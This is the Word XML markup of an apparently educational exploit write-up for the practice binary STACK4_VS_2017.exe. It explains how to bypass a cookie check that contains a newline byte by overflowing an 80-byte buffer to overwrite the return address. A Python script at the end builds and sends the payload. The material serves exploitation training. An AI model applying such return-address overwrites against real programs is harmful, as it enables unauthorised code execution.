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1EC5" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRPr="00D03C2D" w:rsidRDefault="001B00C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D03C2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STACK4_VS_2017.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03C2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569B47D3" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRPr="00D03C2D" w:rsidRDefault="001B00C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E62E5E4" w14:textId="4AF458CB" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="00D03C2D" w:rsidP="00605395">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The first</w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> part is the same</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of previous exercises</w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">54 (80) bytes </w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is still reserved</w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, a MessageBox is called and the </w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> addresses are printed</w:t>
      </w:r>
      <w:r w:rsidR="001B00C7" w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BB3519" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F0D5E1" w14:textId="77777777" w:rsidR="00A3698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A305477" wp14:editId="3B253BE9">
            <wp:extent cx="4867275" cy="2085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9E264" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E341690" w14:textId="33E668DA" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00A53573">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The only thing that changes is in the comparison of the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which as we </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">see now is </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0D0A00.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5269D5" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00A53573">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B2C9D9" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00A53573">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In litle endian would be something like </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00 0A 0D 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3EA15B" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00A53573">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45172DD3" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US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783BF4" wp14:editId="05A0BF1C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1885950" cy="282892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7E2664" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00B2251C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00 : Null character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6693AA29" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00B2251C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0A: New line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F3CCF2" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRPr="00D03C2D" w:rsidRDefault="001B00C7" w:rsidP="00B2251C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D03C2D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0D: carriage return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B4F2C" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F292BC1" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79806852" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2F107E" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E98919A" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E16CD5D" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD12B8D" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72806DA0" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FA962D" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F600A58" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2279D58C" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37020DD6" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D9AA80" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6ECF96" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="00D03C2D" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035E5832" w14:textId="77777777" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00AD0CEC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As we have already seen, the null character will not affect us, but there we have a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0A</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (newline) that if it affects us by cutting the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D9A86" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C0AE77" w14:textId="34ECE70F" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00765401">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">One possible solution is to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>overwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ur</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n address</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and make it jump directly to the message of "</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you win!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E4481" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50827E75" w14:textId="3C1EFEED" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00333282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we  overflow  the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> until we step on the return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7DBFA7" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC61857" w14:textId="03C950A1" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00EC3E6B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let’s</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> go to the stack and select up to </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s (base pointer)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>how many bytes we need to reach the target</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, with right click and </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>array</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E7442" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5ED1C7" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="02D042E2" wp14:editId="0AA283F0">
            <wp:extent cx="5731200" cy="392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2BC47" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRDefault="00A3698A"/>
    <w:p w14:paraId="46E910D2" w14:textId="3EE7903F" w:rsidR="001B00C7" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7" w:rsidP="00210091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we must fill the buffer with padding (</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>88 bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and then </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the address to which we want </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to jump to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">his address is </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00401084</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEAE14A" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D1B85C" w14:textId="77777777" w:rsidR="00A3698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7AC4BA2" wp14:editId="47DE4E39">
            <wp:extent cx="5029200" cy="13430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A9183" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CD449A" w14:textId="3B722927" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="001B00C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This will print the message " </w:t>
      </w:r>
      <w:r w:rsidRPr="001B00C7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You win!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CDA502" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US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A3698A" w:rsidRPr="00D03C2D" w14:paraId="0E84C1F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822" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00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B00C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sys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subprocess </w:t>
            </w:r>
            <w:r w:rsidRPr="001B00C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Popen, PIPE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buffer = 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b"A"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1B00C7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80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cookie = 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b"B"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1B00C7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4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s = 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b"C"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1B00C7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4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r =  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b"\x84\x10\x40\x00"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lastRenderedPageBreak/>
              <w:br/>
              <w:t>payload = buffer + cookie + s + r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 = Popen(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"STACK4_VS_2017.exe"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 stdin=PIPE)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"PID: %s"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% hex(p1.pid))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1B00C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"Enter para continuar"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p1.communicate(payload)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p1.wait()</w:t>
            </w:r>
            <w:r w:rsidRPr="001B00C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input()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1612E53F" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRPr="001B00C7" w:rsidRDefault="00A3698A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF16FA9" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="366BBD22" wp14:editId="5E438A08">
            <wp:extent cx="3648075" cy="8572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59510" w14:textId="77777777" w:rsidR="00A3698A" w:rsidRDefault="00A3698A"/>
    <w:sectPr w:rsidR="00A36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8A"/>
    <w:rsid w:val="001B00C7"/>
    <w:rsid w:val="001C32D9"/>
    <w:rsid w:val="00A3698A"/>
    <w:rsid w:val="00D0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DA62"/>
  <w15:docId w15:val="{1B314849-8C62-483F-9FB0-5FD9774D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Kazimirow</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-24T18:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-24T18:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>